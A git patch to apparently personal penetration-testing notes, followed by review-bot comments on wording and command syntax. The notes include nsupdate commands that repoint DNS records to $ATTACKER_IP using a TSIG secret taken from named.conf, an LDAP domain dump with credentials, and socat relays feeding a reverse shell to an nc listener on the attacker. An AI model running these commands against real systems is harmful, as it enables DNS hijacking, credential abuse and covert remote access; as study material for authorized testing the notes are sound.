From 0f1b59e80fca3a25a0a0fc790decf3feefd9aa9f Mon Sep 17 00:00:00 2001 From: whackx Date: Wed, 9 Aug 2023 21:50:10 +0200 Subject: [PATCH] clean up and rewrite --- Enumeration/:w | 43 ++++++++++++++++++++++++ Enumeration/DNS.md | 14 ++++---- Enumeration/LDAP.md | 5 +-- Post Exploitation/Pivoting.md | 62 +++++++++++++++++++++-------------- 4 files changed, 90 insertions(+), 34 deletions(-) create mode 100644 Enumeration/:w diff --git a/Enumeration/:w b/Enumeration/:w new file mode 100644 index 0000000..4569f3f --- /dev/null +++ b/Enumeration/:w @@ -0,0 +1,43 @@ +# DNS + +## Subdomain Enumeration + +* Get all the info via +```sh +dig @$TARGET_DNS $DOMAIN axfr +drill @$TARGET_DNS $DOMAIN axfr +``` + +There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. +A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters. + +## Join a Domain + +Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk +```sh +nsupdate +server +update delete +update add 1234 A $ATTACKER_IP +send +quit +``` +Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. + +### Found Secrets for Keys + +Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. +```sh +nsupdate -d -y :: +Creating key... +namefromtext +keycreate + +server +update add .. 86400 IN A $ATTACKER_IP +send +``` + +*Hint:* Copy the lines, every space counts as it has to be exactly like in the example + + diff --git a/Enumeration/DNS.md b/Enumeration/DNS.md index 2188e9d..2a2ac01 100644 --- a/Enumeration/DNS.md +++ b/Enumeration/DNS.md 
@@ -8,12 +8,12 @@ dig @$TARGET_DNS $DOMAIN axfr drill @$TARGET_DNS $DOMAIN axfr ``` -* [subrake](https://github.com/hash3liZer/Subrake.git) - +There is also [subrake](https://github.com/hash3liZer/Subrake.git) for sudbdomain enumeration. +A Subdomain Enumeration and Validation tool for Bug Bounty and Pentesters. ## Join a Domain -* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk +Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk ```sh nsupdate server @@ -22,11 +22,11 @@ update add 1234 A $ATTACKER_IP send quit ``` -* Check domain by querying the subdomain's A record via dig/drill/nslookup +Afterwards, check the domain by querying the subdomain's A record via dig/drill/nslookup. ### Found Secrets for Keys -If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain. +Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`. This secret can be used to join the domain. ```sh nsupdate -d -y :: Creating key... @@ -34,10 +34,10 @@ namefromtext keycreate server -update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP +update add .. 86400 IN A $ATTACKER_IP send ``` -Copy the lines, every space counts as it has to be exactly like in the example +*Hint*: Copy the lines, every space counts as it has to be exactly like in the example diff --git a/Enumeration/LDAP.md b/Enumeration/LDAP.md index f9e7fd8..0bd2d94 100644 --- a/Enumeration/LDAP.md +++ b/Enumeration/LDAP.md @@ -2,6 +2,7 @@ ## Get Domain +Use the `ldapsearch` tool to receive information from an LDAP server. ```sh ldapsearch -H ldap://$TARGET_IP -x -s base namingcontexts ``` 
@@ -16,8 +17,8 @@ ldapsearch -H ldap://$TARGET_IP -x -b 'DC=,DC=' -D '\' -W > o ## Domain Dump -* If a set of credentials are known via +If a set of LDAP credentials is known dump the domain via ```sh ldapdomaindump $TARGET_IP -u '\' -p '' --no-json --no-grep ``` -* Take a look at the genreated HTML files +The result is a set of HTML files, take a look at them. diff --git a/Post Exploitation/Pivoting.md b/Post Exploitation/Pivoting.md index 6f71cf1..9c88016 100644 --- a/Post Exploitation/Pivoting.md +++ b/Post Exploitation/Pivoting.md 
@@ -92,37 +92,49 @@ echo y | &.\plink.exe -ssh -l -pw -R ::1 ### Socat +#### Local PortForwarding via Socat + +Open a local port (here 80) on a network interface +```sh +./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80 +``` + +#### Open a reverse shell via Socat + * Reverse shell on target via - ```sh - ./socat tcp-l:8000 tcp::443 & - ``` - * Attacking bind shell - ```sh - sudo nc -lvnp 443 - ``` +```sh + ./socat tcp-l:8000 tcp::443 & +``` +* Attacking bind shell on attacker +```sh +sudo nc -lvnp 443 +``` -* Relay on jumpserver via - ```sh - ./socat tcp-l:33060,fork,reuseaddr tcp::3306 & - ``` +#### Jumpserver via Socat -* Quiet Port Forwarding - * On attacker - ```sh - socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & - ``` - * On relay server - ```sh - ./socat tcp::8001 tcp::,fork & - ``` - * Open `localhost:8000` +* Relay on a jumpserver via +```sh +./socat tcp-l:33060,fork,reuseaddr tcp::3306 & +``` -* Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. +#### Quiet Port Forwarding Through a Relay Server via Socat + +* On attacker +```sh +socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & +``` +* On relay server +```sh +./socat tcp::8001 tcp::,fork & +``` +__Notes__: Open `localhost:8000` on the attacker's browser or curl it afterwards. Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. + +#### Forward Local Port via Socat * In need of a Download on target, expose a port on the attacker via relay - ```sh - socat tcp-l:80,fork tcp:$ATTACKER_IP:80 - ``` +```sh +socat tcp-l:80,fork tcp:$ATTACKER_IP:80 +``` ### Chisel
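Review bot: `Enumeration/:w` (the `create mode 100644 Enumeration/:w` hunk) is an accidental save, almost certainly `:w` typed in Vim while the filename prompt had focus, and should not be committed: its 43 lines are byte for byte the content that `Enumeration/DNS.md` ends up with after this patch, so it only duplicates that file and leaves a stray `:w` in the repository. Drop it from the commit (`git rm --cached 'Enumeration/:w'` and amend) so the diffstat becomes three files instead of four.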
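Review bot: in the `Enumeration/DNS.md` hunk at `@@ -8,12 +8,12 @@`, the heading "Join a Domain" and the sentence "Join a windows domain by setting the A record to the attacker's IP" mislabel what the block does: `nsupdate` performs an RFC 2136 dynamic update that points an existing name at `$ATTACKER_IP`, which hijacks that record, it does not join the host to the domain. Suggest "Hijack a record via dynamic update" or similar. In the same block, `update add 1234 A $ATTACKER_IP` is rejected by `nsupdate` because `update add` requires a TTL (`update add <name> <ttl> [class] <type> <data>`); the second block further down has it right with `86400 IN A`. `server` and `update delete` also carry no argument while the rest of the file uses `$TARGET_DNS`/`$DOMAIN` placeholders, so e.g. `server $TARGET_DNS`, `update delete $SUBDOMAIN.$DOMAIN. A`, `update add $SUBDOMAIN.$DOMAIN. 3600 A $ATTACKER_IP`. Also "sudbdomain" is a typo for "subdomain", and "needs cert and Pk" should say what is actually needed (a TSIG key or GSS-TSIG/Kerberos credentials the server accepts for the update).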
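Review bot: in the `Enumeration/DNS.md` hunk at `@@ -22,11 +22,11 @@`, the rewritten sentence "Sometimes secrets can be found secret like a key, for example in `/etc/bind/named.conf`" is garbled; suggest "Sometimes a TSIG key can be found on the box, for example in `/etc/bind/named.conf`; it can then be used to perform the update." The scrubbed `nsupdate -d -y ::` placeholder hides which fields the colons separate: the argument is `-y [hmac:]keyname:secret`, so `-y hmac-sha256:$KEYNAME:$SECRET` would be clearer. The following context lines `Creating key...`, `namefromtext`, `keycreate` are debug output of `nsupdate -d`, not commands; they should be removed from the `sh` block or marked as output so readers do not type them.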
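Review bot: in the `Enumeration/DNS.md` hunk at `@@ -34,10 +34,10 @@`, replacing `mail.snoopy.htb.` with `..` leaves an owner name that `nsupdate` will not accept; since the intent is to scrub the lab-specific hostname, use the placeholder style of the rest of the file, e.g. `update add $SUBDOMAIN.$DOMAIN. 86400 IN A $ATTACKER_IP`. The hint marker is also inconsistent between this hunk (`*Hint*:`) and the `:w` copy (`*Hint:*`); pick one.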
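Review bot: in the `Enumeration/LDAP.md` hunk at `@@ -2,6 +2,7 @@`, "receive information" should be "retrieve information", and since the command queries `namingcontexts` with `-s base`, say what comes back: the naming contexts of the rootDSE, i.e. the base DNs to use in later searches.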
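Review bot: in the `Enumeration/LDAP.md` hunk at `@@ -16,8 +17,8 @@`, "If a set of LDAP credentials is known dump the domain via" needs a comma after "known", and "The result is a set of HTML files, take a look at them." is a comma splice; suggest "The result is a set of HTML files; open them in a browser." The `-u '\'` placeholder on the unchanged `ldapdomaindump` line has lost its content; `'$DOMAIN\\$USER'` would match the placeholder style used elsewhere.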
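Review bot: in the `Post Exploitation/Pivoting.md` hunk at `@@ -92,37 +92,49 @@`, the new text "Open a local port (here 80) on a network interface" does not match the command `./socat TCP4-LISTEN:8080,fork TCP4:127.0.0.1:80`, which listens on 8080 and forwards to local port 80; say "Listen on a port (here 8080) on all interfaces and forward it to a port bound to localhost (here 80)". Under "Open a reverse shell via Socat", `./socat tcp-l:8000 tcp::443 &` is a relay (listen on 8000, connect out to port 443) and `sudo nc -lvnp 443` is the attacker's listener, so the labels "Reverse shell on target" and "Attacking bind shell on attacker" are misleading; the same hunk also leaves that one fence indented under its bullet while every other fence was dedented. The scrubbed `tcp::443`, `tcp::8001` and `tcp::,fork` placeholders should use `$ATTACKER_IP`/`$TARGET_IP` as `tcp:$ATTACKER_IP:80` does at the end of the hunk. The heading "Forward Local Port via Socat" contradicts its own description ("expose a port on the attacker via relay"): the command listens on the relay's port 80 and forwards to the attacker, so "Expose an attacker port on the relay" fits better. Finally, `__Notes__:` differs from the `*Hint*:` convention used in DNS.md, and the `kill %1` remark should mention that job numbers only exist in the shell that started the backgrounded process.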